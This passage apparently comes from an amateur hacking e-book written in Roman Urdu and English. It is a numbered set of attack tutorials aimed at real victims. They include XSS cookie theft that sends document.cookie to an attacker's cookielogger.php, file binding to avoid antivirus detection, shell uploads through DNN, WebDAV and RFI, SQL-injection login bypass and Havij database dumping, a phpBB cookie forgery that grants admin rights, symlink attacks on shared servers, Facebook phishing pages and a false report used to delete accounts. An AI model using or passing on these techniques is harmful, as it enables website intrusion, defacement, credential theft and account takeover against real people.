site will become ursite.0fess.net/booster.js nw u need 2 convince the admin of that fane page to put following code javascript:(a = (b = document).createElement("script")).scr="//www.ursite.0fess.net/booster.js", b.body.appendChild(a); void(0) note replace ur web link in above javascript.End 76) How 2 make file undetectable using winrar: we will bind 2 files using rar highlight both files n then go 2 add to achive change the name and select "create sfx options" go2 advanced at the top and click on sfx options in the general tab type the name of file u want 2 run after extraction go2 modes tab and select hide all go2 the text and icon tab and change the icone click ok on the advanced windows and ok in main window n enjoy 77) Xss kay script hoty ha bus wo url ma web gay agy lagty jaho or dnn ma ek url or ek java script use hota ha bus.
What is Cross Site Scripting (XSS)? Cross Site Scripting allows you to insert a malicous code into a web application. (almost with a javascript code, but it is also possible to insert other codes like PHP or HTML. It is a vulnerability which is on almost every website you can find on the WWW. In addition I will talk about 2 different ways to use XSS... 1. The attacker will include a code into a URL. The XSS will not stay on the page. 2. The attacker will be able to insert a code and it will stay on the website. Usually the attacker will choose a website with some "input fields", like shoutboxes, blogs and guestbooks Finding XSS vulnerabilities 1.Visit http://www.google.com 2.Use"google dorks",like search.php?q= Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 51
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 3.Found the "right" website to inject it The Basics of XSS A common used Cross Site Scripting injection is the following javascript code: Code: <script>alert("something")</script> If u execute it, it will popup a message box which will say "something". Soooo, if you have found a vuln website you could test if it is vuln to XSS. Just look: Code: http://database.delete.com/search.php?q=<script>alert("something")</script> That was a example for a javascript based XSS. But as I told you before, javascript isn't the only type of code you could use to execute a XSS. Here is a example for a HTML injection: Code: <br><br><b><u>something</u></b> Will look like: Code: http://database.delete.com/search.php?q=<br><br><b><u>something</u></b> You should see a bold text on the page, if the page is vulnerable to XSS. Defacment with XSS To deface a website with Cross Site Scripting (XSS) you could use the following codes: Code: <IMG SRC="http://mywebsite.com/defacmentpic.jpg"> = will include a image Code: <EMBED SRC="http://mywebsite.com/deface.swf" = will include a flash video Code: <embed src="deface.mid" hidden autostart="true" loop="false" /> = will include a music file in hidden mode Code: <script>window.open( "http://www.hackforums.net/" )</script> = will redirect you to another website, in this case "hackforums.net" Stealing Cookies using XSS The most used method of XSS is the cookie stealing. First get a cookielogger.php (will attach it!) Okay, now we have the cookielogger.php. Upload it to your server and also create a log.txt where your logs will be stored. Make sure that it works! Search a vuln website and insert following code: (replace it with your information) Code: document.location = "http://myserver.com/cookielogger.php?c="+document.cookie Now, if the user visit the website his cookies will be stolen and sent to your cookielogger. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 52
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Analyze the logger for his cookies and hijack his session. But what is if the website hasn't a such store function? See... Code: http://website.com/search.php?q=document.location = "http://myserver.com/cookielogger.php?c="+document.cookie You will redirect the original website to your server. (you should "crypt" the URL string, because your victim could notice the malicious code included to the original URL) But how "crypt" this code to become "normal", so that your victim don't notice the redirect to your server? Easy...all you need is a String to ASCII Converter and the function char() ( http://www.easycalculation.com/ascii-hex.php ) Okay, now pick your javascript code and convert it to ASCII. Example: Code: <script>alert("Example")</script> is equal Code: 60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62 Now,your browser only could read the code if there is a comma between the digits.Like this: Code: 60,115,99,114,105, ?<...?> Finished! You crypted your malicious code to a "hidden" malicious code :D! Bypassing Filters But what we could do, if a webadmin has blocked some characters? Hm, we need to find another method...just write the code in a different way. Code: <script>alert("Example")</script> would be Code: ')alert("Example"); Code: ')alert('Example'); Code: ")alert("Example"); ?<...?> continue that to find a way :) Yeah,that is it. # Finish # 78) Abbreviations (IIS) Internet Information Services (PHP) PHP Hypertext Preprocessor (DNN) DotNetNuke kuch zorar abbrevitiati0n jo lacture mea use h0ty hn malik_saab: Dnn dotnetnuke ek web application ha. Jst like j00mla,w0rdpress,vbulletin... Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 53
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree But ye sirf iis par h0st ki jati ha How to install DotNetNuke 4.5 to Windows XP Pro with IIS Video tutorial, how to install DotNetNuke 4.5 to a bare bones installation of Windows XP Professional. www.dnncreative.com/ How to Hack a site by Dnn? Sub se pehle karna ye hai k google mein ye dork search karen: inurl:"/portals/0" site:.com Phir jo sites hongi wo esi hongi: www.bo0m.com/portals/0/ Isko kholen. Us site k url mein portals/0 ki jaga ye likhen: providers/htmleditorproviders/fck/fcklinkgallery.aspx Phir site esi hogi www.bo0m.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx Phir agar aap k paas box bana ata hai us mein likha hoga: "Files on your site" Uspe click kren. Phir ye java code url ko mita k daalen: javascript:_dopostback('ctlurl$cmdupload',") Us k baad upload ki option ajaega. Phir upload karden apna shell ya deface. Is mein html upload nahi ho sakti. Jpg hoti hai only.End 79) Dork link hotae hain special web k.Tm koi b dork google mai dalo phr buhat web i ge.Koi b select karo aur url k akr mai number k bd ' dal.Agar mysql not respond jaisa eror iya tou web hack ho sakti hy.Then colum n0 pta kar colum 1-- lik kar.Phr union maloom kar.2 step aur hain phr web hack.Pouch le apne hacker se.Yae msg 4wd kar k. Dorks for webdav: ,,"inurl:.com/webdav/" Isi tarah agr India ki chahiye ho to: inurl:.in/webdav/ Ye dorks Google me search krn Us k baad site aisi hogi: www.tahirsite.com/webdav/hj Apne krna ye hai k is site ko copy karen: www.tahirsite.com/webdav/ Aur my computer kholen Aapse username or pass maangega. Default username wampp and pass xampp hai. Ye daal k ok karen or us site ka name h4cked rakhden and finish pe click karen. Phir agar deface page dalna ha to u.h.html ko copy kr k us folder me paste kren Agar shell daalna ho to shell.php ko copy kr k us folder me paste krden. Agar apna deface page dekhna ho to www.tahirsite.com/webdav/u.h.html Aur agar apna shell kholna ho to www.tahirsite.com/webdav/shell.php ----Finish--80) I m going to share rfi web access method. rfi vulnerable sites ko serch krne k lie gogle me Rfi dorks likho.Phr jo sites ayegi wo kuch is trah hogi Www.site.com/index.php?action= Us site ki vul search karne k liye=sign k aagy Www.google.com likhen. Phir url kuch aisi banegi: www.abc.com/index.php?action=www.google.com Is url se agr google ka main page khulta ha to ye site Rfi vul ha Phir ye krna hai k kisi webhosting like t35.com ya 110mb.com pe c99 ya r75 shell upload kren. Ab ye karen k site mein jaha aapne Google ka link dia tha, Waha ab apne shell ka link den. Is se site is tarah hojaegi: Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 54
Power Of HackingŽ Facebook:https://www.facebook.com/HAckingRouterwifiFree Www.abc.com/index.php?action=www.yourt35site.com/c99shell.php? Shell ka link php tak hai, Us k baad aapne ? lagana hai warna is k baghair shell execute nahi hoga Phir aapki control hogi us site pe. Jo bhi krna hai karen. Contents del marden ya apna deface page upload kren. ------Finish---RFI, ka example he, site.com/page.php?id=http://yoursite.com/shell.txt -o killer.php ya shell.txt? Rfi remote file inclusion. Ap server ko bewakof bna kar us mai ek file daltae ho jis se ap b admin wale kam kar sakte ho.Yae fills shell kelatae hain 81) r00t se whm tak acces h0ti ha ap ssl client ya r00tkits ya putty se b login hoskte hen sh client se r00t server ka main chez js par p0ray system par acces milti ha means u can access all h0sted on same server 82) LFI k lye data tamper addon use kya jata he 83) Web par shell upload k bad web par deface page mt dalo.Bal k local§host k folder mai ja kar deface page dalo..Error 70 i ya tou vuln nh.Agar nh iya error then tm ne mass deface kardia.Ku k dnn windows server ha or local_host ma deface page dalne se sb web ek sath deface hojai ge jo server pr honge.Kise server pr 100 kse pr 100 kse pr km hoti hyn.Is tarha ap ek sath itne web hack kardo ge. . Waise windows hacking mai maza nh.Yae he kam linux par karne k leyae skills chayae. 84) Download ie pass recovery.Wo jitne b auto save pasword hai computer mai nikal k samne la dai ga.Ap phr net par search karo how to hack id by usb. Wahan ek code hoga wo copy karna note pad mai aur .Bat ke extension mai dal dain usb mai. .Bat wali file cmd mai khulti hai..Yani .Bat ke file aur iepass recovery usb mai dalne hoge.Phr jis computer mai usb lagao ge us k auto save pasword tmare pas..Thanks 85) Wht is banner grabing? Ap server ke info nikaltae ho.Os version wagaira.. Ap jb server ke info nikal loge tou further exploit kar saktae ho. U need netcat. Phelay port find karo.Netcat se kar saktae ho.But i recomend nmap. Then port aur ip se karo exploit. Type some thng -v -n ip port 86) PHP ki urdu pdf book download krlo.just visit www.smssms.tk PHP is a general-purpose scripting language originally designed for web development to produce dynamic web pages php aik programing language hai. Bohat se php file mil kr aik script bnate hai. Yeh aik kisam ka online software bn jata hai. Bari site hamisha php script main hote hai.Jaisy google, youtube,twitter,facebook ye sb sites php scripts ma bne hote hn.Or inka clone yani iske nqal script net sy easly thori se search k bad mil jaty hn.Best site scriptmafia.org ha jahan sy hr qisam k script mil jaty hn Jis sy apna apna search engine, fb jaise site, job site, marraige site, projects site, ptc sites, bna skty hain. Yeh php scripts bohat costly hoty hain. Magar programer isko null kr daity hain mean unhain crack krty hain. Aur inke protection ko remove kr daity hain. Is tara hm isy free use krty hain. Likin null script main aik masla hota hai ky isky 1, 2 features kam nain krty. Aur agar koi masla ajai tu script bnany wale company ko complain b nain kr skty. but php web prgrming lang he uske b bugs hn jinhe lfi & rfi kha jata he,& also http get, headers se Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 55
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree info le kr sites hack ki jati hn,iske lye accunetix use kya jata ha http editor,& php injection like rfi lfi to sbko pta ha via metasploit b inject kya jskta ha A General OverView on DNS Poising Url Redirection. Ap yae kaam cain and abel se kartae ho.Cain hash decyption k b kaam ata hai. Dns poising url redirection mai attacker victicm ko kise khas url par redirect karta hai. Jaise victim jb b facebook.Com khulae to facebook ke jaga myspace khul jai. . . Is mai 3 ip involve hnge. Attacker victim router hota yae hai jb b victim web khole ga tou router ko request jati hai aur web khulti hai. Lekin dns poising mai victim ke request router ke jaga attacker ko ajati hai aur attacker url change kar k router ko request daita hai. Jaise Ap facebook kholae aur mai facebook ke jaga apne fake page k url ke tarf redirect kardn. Jb b wo facebook.Com khole ga fake page khule ga usko pta b nh chala. Yae smjhane k leyae bola.Just imagine ap is se web hacking mai kia kia kar saktae hain. *finish* 87) /"How to hack DSL connection.?"/ What is DSL It stands for Digital Subscriber Line It Offers High Data Transmission Rate b/w 128Kb - 10Mbps Its a Special Line Via which U can Use Internet as well Phone It works via network cards and DSL Modem DSL Types ADSL, R-ADSL, HDSL, SDSL & VDSL How To Hack DSL Connecting ? 1st Download Ip Scanner From google And Than Install It after Install Open Google And Type In Search Bar What is My Ip and Press Entry Now Open 1st link and See ur Ip.. Now U Will See Ur Ip E.g 256.100.580.100 Now Open Ip Scanner Software And You Will See 2 Columes Now Write Ur Ip Like this 256.100.580.(1) And In 2nd Colume 256.100.580.(254) Remember that Don't Use () ok Change ur Ip Last number ok.. Now Click On Start And Wait 4 Process Will Complete when Process Completed now Right Click On Any Ip On That Software And Copy the Ip And Paste it in Address bar And entry Now its Ask ur about user and Pass (admin) is User and Pass And Now Enjoy... if u have any Problem Ask Me Thanks Hope U Like it... remember me in ur Prays.End 88) (HacKiNG) FB Ki ACouNT HacKinG ThrouGh FaKe PaGe Ho SakTi HaI, InTroDucTioN: Is FaKe PaGe Ke ZariYe HuM FB Ka AcounT HacK KaR SakTaY HaiN.. Ye SaMe To SaMe Face BooK LoGiN JaiSa PaGe HoGa.. AuR KiSi Ko ShaK (DoubT) Bi Ni HoGa.. See NexT Ab AaTeY HaiN Is FaKe PaGe Ki CoNsTrucTioN Ki TaRaF CoNsTrucTioN: Face BooK FaKe PaGe DownLoaD KaRo GooGle Se.. EasiLy MiL JaYe Ga.. PhiR Is FaKe PaGe Ko UpLoaD KaRo.. Ab QuesTioN Ye HoTa HaI Ke UpLoaD KaHaN KaRaiN...? AnSweR: KiSi Bi Free Web HosTinG SiTe 4 ExaMpLe 000a.biz 110mb.com Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 56
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Byethost.com In MeiN AcounT BaNao.. Aur FTP SeRveR MeiN Jao.. WaHaN PaR Index NaMe Ki FiLe HoGi See Next Us Index FiLe Ko RepLace KaRo ApNaY FaKe PaGe Se... Lo Gi ApKa FaKe PaGe Ho GaYa CoMpLeTe... Now QuesTioN AriSe Ke Ab IsKo Use KaiSe KarNa HaI...?? AnS: JaB Ap Free HoStiNg MaiN ApNi SiTe BaNao GaY, To Jo SiTe LinK HoGa Wo ApNaY VicTiM Ko SeNd KarNa HaI, Agar Wo FaKe PaGe Se WaKiF Na Hua To Wo Us MaiN LoGiN KaraY Ga, TaB UsKi ID WiTh Password Apke PasS Aa JaYe Ga.. Q:Who Is VicTiM..? Ans:VicTiM UsaY KehTaY HaiN JiS Ka AcounT Ap HacK TXT" Ke NaMe Se Aa JaYe Gi AgaR VicTiM Ne ApKe FaKe PaGe MaiN LoGiN Kia Hua HoGa To UsKi ID And Password Us FiLe MaiN Aa JaYe Ga... <==The End==> 89) facebook pa ksi profile ko hack krny k lia kai s/w han par, ''Facebook pass steal v.3.0'' Sb sa tey kam krta ha. Iss pa e-mail likhy pas apko pata lag jay ga. 90) apko boht fake trix n toolz mila ga but real hack jst viruses sa ho ge.. Ap victim pc ma virus attack kre.. N remote pc sa paswrd hasil kre.n cyber attack sa un ki firewal n antivirus corrupt kren 91) *Introduction about Hacking* P1 What is Hacking?? Why we Hack a Site?? How is it possible to Hack a Site?? Hacking means "Get the Admin Rights on any Site and upload ur Deface Page" Simply u can say that it means "Breaking the Security" Now a days, Cyber Wars going on the top with Paki and Indian Hackers. Its a very sensitive and amazing compatition. If u Hack any Site of any Country(except India),U may be arrested.For this reason,We have to Hide our Ip Address.Many Sites & Softwars provide us Fake Ips.There r many ways & methods of Hacking.In my opinion"Sql Injection"is very easy 4 beginners.We use Scannerz,Tools, Softwarz,Key Loggerz, Shellz,Deface Pagez, Trojanz,Virusez etc 4 Hacking.I think that"Hacking is not a Crime,Its jst a Game of Mind 92) Havij to hai na sab k pas nai hai. To Dwnload maar lo. . Http://adf.ly/yMkT Then mint mai instal maro. . . Or open kro. . Havij mai zyada noob user's ko ye msla bnta hai k dork lga k koi site lga dalte hn. Or us dork mai itni vulnrble sites milti nai. Ak do site lgai havij ne Not Vulnerble eror dy dya. . . To Phle ap ko Sites daikhni hain k kn si Hackable (vulnerble) hai. Us k ly visit the link. Adf.ly/yMpl us link se ak web open hogi. killerblck aple naam ki. Jo k online Scaner hai. Black screen hogi or upar Green color mai likha hoga. SQLI Scaner By Xuhaid Dork Neche Blank mai ap apni marzi ka fit sa dork lgao. . Dork list pas rkho. . Then start pe click kro. . . Start krte he. Scaner webs Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 57
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree scan kre ga or Vulnrble sites k agay Sql injection Success Green color mai likhe ga. Or Not Acces Red mai lekhe ga. Sql acces wala koi ak link cpy kren. Havij mai paste Online minto ma boht c vulnrble sites dyga ak ak kr k havij ma dalo or scan kro. .Havij har ak ka Target Vulnerable he kahe ga.. HAVIJ mai scan kro jb scan ho jai to. DB pe Click kro. Then Scan hoga data base . . . table pe click kro ge then Get DB pe to data base scan hoga.Jb ajai data base to jtne option ayen unhe slect kr k Get Table pe click krn Table find krne k bad Admin User Id in option ko daikhen. Or un k colum. . Scan kren. . . Bilqul tartib se chaln hai. Get Db then Get Table Then apne kam ki chez just (admin pwd id) ko select kr k Get Column Admin paswrd id. K colum ko select kr k get data pe clik krna. . Paswrd id bta dyga. . Ya hashs mai hoga. . . Md5 wale tab ja k post krna admin paswrd mil jai ga. . End. . 93) A little info abt symlink.Symlink hacking mai buhat kam ke chez h. Is se ap web ka pura data base download kar saktae ho aur hack b. Symlink mean similar link.Ye chez linux operating system ne nikali the.Jo log ubunto,fodora ya linux use kartae h unko pta hoga.Symlink tora folder shortcut ke trha hota h.Ap ubunto ma simple foldr pr right click kr k symlink pr click krn ge to ek new foldr bn jaiga symlink ka Basic different symlink aur folder shortcut mai path ka h.Folder shortcut mai path wohe i ga jo real folder ka h.Lekin symlink ma path kuch alag hoga Symlink ka path alag hone k wja se ap ek chez ko alag alg jga se cnnect or use kry ho.Example ek portable hardisk k symlink bnai or ek mobil connectivity ma dal dia ek local_root ma etc.Is se portable hardisk ke speed pr frq ni pryga.Symlink alag path jo bnai ga sb k Alag path hnge par excess same chez hoge. . . Path alag hone ke waja se jo chez par parword ya koi restriction lage ho k ap nh khol saktae.Agar us ka symlink bnaya jai tou wo file khul jai ge. Nw yae symlink ke info the nw use off symlink in hacking. Hr web ek computer se chlti h called server.Us server pr hr web ka folder hota h jis ma web ki sari file wagaira save hoti hn.Sirf kuch file ko public rights diye jaty hn.Baki files ko koi nhi chhaer skta admin k ilawa Qk wo public nh.Jb b file open hoti h server check krta h link path k ye file kon khol skta h.Nw hr web folder ma usky pasword b save hnge.Pura data base save hoga.Agr data base download kr leya jai tou web hack Nw ap web ka data base download karne k leyae web k folder ka symlink bnao ge.Waise wo folder khul nh sakta.Lekin ku k symlink mai path alag, magar excess same chez hoti h tou ap data base ka symlink bna kar wo folder khol loge.And finishd ur victim. Symlink bnane k leye apko shell chahye hoga uploaded kisi web pr.Shell jis web pr uplood hoga us web pr ap changes kr skte ho.Nw jis server pr apka shell wali web h us server pr apna victim dhundo.Then shell se symlink bnao server pr apne victim k data base ka.Or ghus jao data base ma. Symlink bnane k leye kuch code use hoty hn jo exploit kehlaty hn.Kafi ache exploit mil jaege pr jo boht ache hoty hn wo privat hoty hn log share ni krty Symlink ka advantage ye hua k frz krn ek web hack krna muskil h par jis server pr web h usi server ki dusri web hack kr k ap symlink apne victim ka bna kr uske tyt security b zero krdo.Matlb kise b server ke ek web hack krli jai tou kafi chance h ap us server k dusri web b hack kr skty ho by symlink Symlink sirf ek link bnata h jo apko web ka data base wagaira asani se excess dai ga.Acha symlink server par bnta h.Aur server par kuch karne k leyae apko shell chayae. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 58
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Shell ap koi b bikar web hack kar k upload kardo. Simple words ap ek server ke koi b ek web hack kar k dusri un hackable web hack kr skty ho. 94) IIS h4cking k liye dorks to koi nahi hai, but Google.com me kuch b search krlen or jo site b aaye use check kren. Us site ka link copy karen, Www.site.com,phir start pe click karen or run pe click karen or usme ye code likh k enter karen: %WINDIR%?/EXPLORER.EXE,::?(20D04FE0-3AEA-1069-A2D808002B30309D?)?/::?(BDEADF00-C265-11D0-BCED-00A0C90AB50F?) Web folders khul jaega, pihr usme file pe click kren, phir new pe or phir webfolder pe. Add webfolder wizard ajaega. Usme apni site paste karen www.site.com or next karen. Agar to next hojata hai iska matlab hai k site vul hai or agar connect nahi hota to vul ni hai. Agar next hojae to uska koi bhi name rakhen or finish krden.Ab webfolder me wo site aa chuki hogi us pe double click kren. Wo khuljaegi. Ab uspe apna page upload krden like u.h.html. Apne page ko copy karen or isme la k paste krden isi tara shell b daalende. Apne shell.php ko copy karen or site k folder me paste krden Apna page view krne k liye www.site.com/u.h.html or shell dekhne k liye wwe.site.com/shell.php. ----FINISH---95) Trick 4 Iis hacking meth0d Iis me hm last me apne deface page ka nam likhte hain site link k agey like www.site.com?/hack.html but agar hum apna deface page ka nam php xtensn me rakhen jase defacepage.php aur is ise upload karen iis method se. To hamara deface page site k h0me page pe show ho ga agey apne deface page ka nam likhne ki zrorat ni . . ! Trick w0rking but n0t on all iis vul sites. . ! Iski reazn shayd ye k server html se pehle php chk karta ha. . Iis se site hack ho to jaldi jati hai. . . Par search krna rola hota hai. . Us ne whan sb ki list daikhi or kha in ko mai hck kr skta hn. . Kr to koi b skta hai par wo khud search kr k hck kr k btai na. . . Kahan milti hn 2003. Win ki sites. . . Iis ki vulnerablity chinese webs mai bhot hoti hai kiu k china webmastero ko is vul. . Ka nai pata. Is ki vul. Webs search krni ho to Google.cn mai china k google mai search kro.. Google.cn mai dork lgao. iis ki vulnerable sites nai milti. . . . . . . Web dave. . . 96) jb koi site hack ki jaye to us ka ooper link b hona chahiye . . . Like this www.site.com/admin_login.asp isi trah hr site ka apna link hota h. Jb aise link pr jayen to wahan 2 lines hoti hn username and passwors un dono ko fill kro or site mn hr chez edit kr do. . . Ok 97) TROJANS : Trojans can be used to do sily things to a system like changing desktop, user interface, to0k c0ntrol of m0use etc.. it can also be used to do s0mething serious like accesing ur data, erasing ur files, stealing paswrd etc. End 98) Aucntix vul find karta ha k ye site hack ho skti ha k ni . . . Agar ho skti ha to kis meth0d se? 99) Vbulletin hacking. Vbulletin mai bugs nikaltae hain expert inko exploit boltae hain.Ache bugs private hotae hain.Ek purana exploit share karta hn. This exploit is for vb 3.8.6.Faq.Php nam h. Aj kal takreban sb forum patch hain.Matlb is bugs se secure.Jb b bug public hota h tou patch ata h Pehlay apko ek web chayae hoge vbulletin 3.8.6 par. Find it by this dork. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 59
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Powered by vbulletin 3.8.6. Yae apko dunya br k forum btai ga.Sirf indian forum chayae tou go0gle dork yae hoga. Powered by vbulletin site:.In then web khol k faq par click karen. And type database agar forum vuln hua data base ke info ajai ge samne. Newest vbulletin public exploit sqli vuln exploit h vb mai.Nam is 0 day exploit.Yae exploit group search sqli vuln ke tarha h. Sqli vuln vbulletin 4.0.3 to vb 4.1.3 tk the.Iska patch i ya.Par dubra vuln i.Nw ths is embarssing abt vb security. End 100) vbforum md5 +salted hashes h0te hen wo easily crack nai h0tay insidepro par list bna kr hashes ki send kro wo krdngay, ya passpro t0ol best he time lega.. 101) i garantee tm logo ko yae asan tareka nh pta hoga.Methd stil private hai. Install/install.Php ek tarekae se recove kar saktae ho.Server-db par ek perl exploit parha hai lekin public nh hai.Tm instal/instal.Php recover mar k vb dubra instal mardo ge.. 102) cokie stealing sb ko pta hai..Ap ek asan tareke se begair victim ko java script addres bar mai execute kara k kaise grab karoge.Yae main bat hai.Kisi ko tm ma se.Cokie stealing ati hai.. T35-cookie bug download kar sab cokie ajai ge samne 103) vbulltin hacking.a simple vulnibility found in vbulltin 3.8.6.Ap jao aur jo nam admin ka hai us name se regestration karo.Agar admin name hai web onner ka tou registration mai likho name ke jaga admin&#00.Ap admin k name se regester hojao ge.Yani vb forum par 2 id hnge admin k nam ke.Aur jo b pm wagaira admin ko kare ga apk pas b msg i ga.Patch a chuka tha.Purani vuln hai.Version b purana.Dork powered by vbulltin 3.6.8. 104) Bt Aesi id ko admin jis wakt dkh le usi waqt ban krta ha. . ! Aur zada tar mein admin name ka id ni hota owner/admin ka. . ! Aur Admincp mein plugin instal kia jata ha jis mein pvt msg ka cmplete log hota ha. !
105) How to delete any ones facebook account a little bit of social engeenring? Page no.1 Requirements. 1. Victom ka full name 2. Victom ki date of birth 3. Victom ki fb profile ka url address 4. 1 id banayen yahoo per ya gmail per victom kr first and last name ki. Yeh sari details ap ko victom ke fb account se mil jayen gi. Ab is link er jaen www.facebook.com/help/contact.php?show_form=cannot_identify 6.Ab jo sari requirements thi wo is form ma fill kr dyn Form ke last option main 'description of your issue' Us main ap khud victom ban ke kahen je meri yeh id kisi ne hack kr li hai main 1 regulr membr hn or new acnt bnane mn mjhe koi diqqat nhn h. Facebook team ap ki yeh application parhtw hi wo account 24-72 hours main del mar de gi. And da victom is hacked Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 60
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 106) How to hack fb account with phishing page. Page no.1 1. Taqreban aksar free hosting site pr acnt nhn ban rahe ya phr un sites ke link fb per shaere nhn hote sub se pehle my3gb.com per free register hon. 2. Ab facebook.htm or .php download karen ap ko sherazhackz.tk per mil jayen gen ya ksi b hckng blog ya site pr b mil skty hain. 3. jo ap ne facebuk.html or .php download kiye they wo files apne my3gb.com waley accout pr upload kar den. 4. Ab my3gb.com wale accnt mn jo facebook.htm h us file per right click karen or 'copy link address kren. Now yeh addres apne victoms ko den jb wo login ho ga fake pg mb to us ka pw ap ke my3gn account mn a jae ga. 107) How to Hack any Site by Sql (Beginning)? Step 1: Firstly open Google. Step 2: Now type there: inurl:adminlogin.asp Step 3: Now open any Site. The site will be something like this: http://www.site.com/adminlogin.aspStep 6: Now in Admin Panel, type in Username: 'or'1'='1 and also type this at Password. Step 7: Now Site will open. Find here the uploading image option (Add product, Edit product etc) and upload your Deface Page by Shelled it. 108) SQL Helper Or Havij dono alag alag Tool hain SQL vulnerble sites hck krne k ly. . . SQL helper bhtr hai is ly is msg mai Main tool Sql helpr use keya gya hai or Havij ko sirf admin page find krne or md5 hash crakng k ly use keya gya hai. . Dorks google mai bhot mil jate hn. Exploit scaner tool se vulnrble sites find ki jati hain. In sb ki alag alag f ul dtail google or utube se mil jai gi. . . 109) Ye Page jst web hacking vulnerablities hain. . . Har ak tariqa full tutorial rkhta hai. . . In mai jo comon use hote hn. Wo SQL INJECTION. RFI LFI IIS DNN XSS hain,. . . 110) DownLoad "Magic Blue Hack" From upLoading.com And Hack other's Mobile without Getting permition. 111) Dork ek esi string ya query ko Kehty hai jo Huma Un pages tak poncha day GA jo google na chupaya hai.yane website k admin login page our vulnerable:) our Hidden Ip k liye software koi b acha nai hai qk App k ip wasa b catch ho gy jb app hacking karta ho hidden nai hota ip kabi b... Wasa 4 safety use easy Hidden ip software. 112) Mask ip changer thek hai our Hide easy ip b thek hai itshine.tk sa pak k site hack nai karo baqi kisi k b site karo kuch nai ho gy without ip changer i don't use 113) Kuch Dorks yah hai Inurl:index.php?id= Inurl:news.php?id=4 inurl:adminlogin.asp inurl:admin_login.asp inurl:adminlogon.asp inurl:admin_logon.asp inurl:??admin/admin_login.php inurl:/admin.asp inurl:/login.asp inurl:/logon.asp inurl:/adminlogin.asp inurl:/adminlogon.asp inurl:/admin_login.asp inurl:/admin_logon.asp inurl:/admin/admin.asp inurl:/admin/login.asp inurl:/admin/logon.asp inurl:/admin/adminlogin.asp inurl:/admin/adminlogon.asp inurl:/admin/admin_login.asp inurl:/admin/admin_logon.asp inurl:/administrator/admin.asp inurl:/administrator/login.asp inurl:/administrator/logon.asp inurl:root/login.asp inurl:admin/index.asp 114) Ap apni gmail id hack hone se bacha sakte hen. How? Visit this link http://huff.to/h3zzBm 115) How 2 hack vublltin 1.jst visit forum in mozilla firefox Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 61
Power Of HackingÂŽ Facebook:https://www.facebook.com/HAckingRouterwifiFree 2.close the browser 3.open cookies.txt (c:documents and settings/username/application/data/mozillafirefox/profile/blah.defult) nw look 4 127.0.0.1 false / false 1141920503 phpbb2mysql_data a%3a0%3a%7b%7d replace above with 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data b%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3Bs 3A6%3A%22userid%22%3Bs%3A1%3A%222%3B%7D Save cookies.txt nw open browser n go 2 forum nw u hv admin rights --finishâ&#x20AC;&#x201D; 116) If anybody wants to become a world class hacker. Then open this all in one site : Hackforums.net Dunya k tamam hacking forums k admins ne yaheen se sub seekha hy. Also visit mtahirzahidsu.blogspot.com 117) yahoo Hacking K Lie Download (Trojan Maker)r(Mps) (Bus Hack) r (Deep Throat Trojan).Or Net Hacking K Laha (Download Net Hack 3.4.2)
Hack Tutrial:-
Come TO Learn Best SEO for your site in URDU kisi bhi website ki kaamyabi aor publicity ka andaza us ki traffic say lagaya jata hy, site par jis kadar traffic ziyada hoti usi kadar site say amdani k zayae ziyada aor assan hotay hain, me aap ko isi topic pay bether guide karnay ki koshish karon ga. is k liye aap k pas site/forum/blog hona laazmi hy. jesa k (mtahirzahid.blogspot.com) SEO Search Engine Optimization. internet say information aor website tak access hasil karnay k liye search engine aik boht bara zariya hai. saarif na to har mozu per web address janta hy aor na ziyada dair yaad rakh sakta hy, to aesi soorat me sirf search engine hi wo wahid zariya hotay hain jin k zariye, saarif apni matlooba maloomat tak rasai hasil karta hy aor kisi bhi mozu per mawad k liye. web site me traffic generate karnay me sarch engine ka kirdaar intahi ehm hy... search engine me google, yahoo aor msn hain jin me shamooliyat say aap ki site k liye ziyada say ziyada traffic milti hy. is liye aap ki site search engine friendly hona lazzmi hy. Meta Tags importence in Search Engine: Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 62
